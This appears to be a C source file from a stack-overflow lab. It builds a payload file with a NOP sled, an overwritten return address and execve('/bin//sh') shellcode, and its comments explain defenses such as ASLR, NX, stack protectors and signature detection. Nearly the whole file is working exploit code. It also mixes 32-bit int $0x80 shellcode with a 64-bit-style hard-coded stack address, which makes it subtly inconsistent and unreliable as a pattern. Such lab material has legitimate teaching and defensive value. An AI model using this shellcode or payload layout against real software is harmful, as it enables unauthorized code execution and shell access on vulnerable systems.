exploit.c (908B)
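#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Stack-smashing lab artifact: writes a 517-byte file named "bad" holding
 * NOP filler, one overwritten return-address slot and a small payload.
 * The program that reads "bad" is not part of this file.
 *
 * Defender's view: the layout relies on a hard-coded stack address and on
 * running bytes placed on the stack. Standard hardening removes those
 * preconditions:
 *   - ASLR makes a fixed stack address unreliable;
 *   - a non-executable stack (NX/DEP) stops the payload from running;
 *   - stack protectors (-fstack-protector*) detect the overwritten frame;
 *   - bounded reads/copies in the consumer remove the overflow itself.
 * A long run of 0x90 bytes ahead of an execve("/bin//sh") stub is also a
 * classic content signature for file and network inspection.
 */

/*
 * Payload bytes; the mnemonics are 32-bit x86. The stub pushes the string
 * "/bin//sh" and issues system call 0x0b through int $0x80 (execve on
 * 32-bit Linux). As a string literal the array carries a trailing NUL, so
 * sizeof(code) is one more than the instruction bytes.
 */
static const char code[] =
	"\x31\xc0"		/* xorl  %eax, %eax  */
	"\x50"			/* pushl %eax        */
	"\x68""//sh"		/* pushl addr        */
	"\x68""/bin"		/* pushl addr        */
	"\x89\xe3"		/* movl  %esp, %ebx  */
	"\x50"			/* pushl %eax        */
	"\x53"			/* pushl %ebx        */
	"\x89\xe1"		/* movl  %esp, %ecx  */
	"\x99"			/* cdq               */
	"\xb0\x0b"		/* movb  $0x0b, %al  */
	"\xcd\x80"		/* int   $0x80       */
	;

/*
 * Build the buffer and save it to "bad" in the current directory.
 * Returns 0 on success; any I/O failure ends the process through err(3).
 */
int
main(int argc, char *argv[])
{
	FILE *badfp;
	char buf[517];
	/*
	 * Offset 0x24 and this address are hard-coded for one specific build
	 * and environment of the lab target; they are not portable.
	 */
	const long ret_addr = 0x7fffffffe670 + 0x60;

	(void)argc;
	(void)argv;

	/* fill with NOPs */
	memset(buf, 0x90, sizeof(buf));

	/*
	 * Place the return address. memcpy is used instead of storing through
	 * a cast (long *): buf + 0x24 has no alignment guarantee for long, and
	 * the cast store also breaks strict aliasing. The bytes written are
	 * the same.
	 */
	memcpy(buf + 0x24, &ret_addr, sizeof(ret_addr));

	/* payload (with its trailing NUL) occupies the last bytes of buf */
	memcpy(buf + sizeof(buf) - sizeof(code), code, sizeof(code));

	/* save to "bad"; binary mode, since the content is not text */
	if ((badfp = fopen("bad", "wb")) == NULL)
		err(1, "fopen(bad)");
	/* a short write or failed flush would leave a truncated file */
	if (fwrite(buf, sizeof(buf), 1, badfp) != 1)
		err(1, "fwrite(bad)");
	if (fclose(badfp) != 0)
		err(1, "fclose(bad)");

	return (0);
}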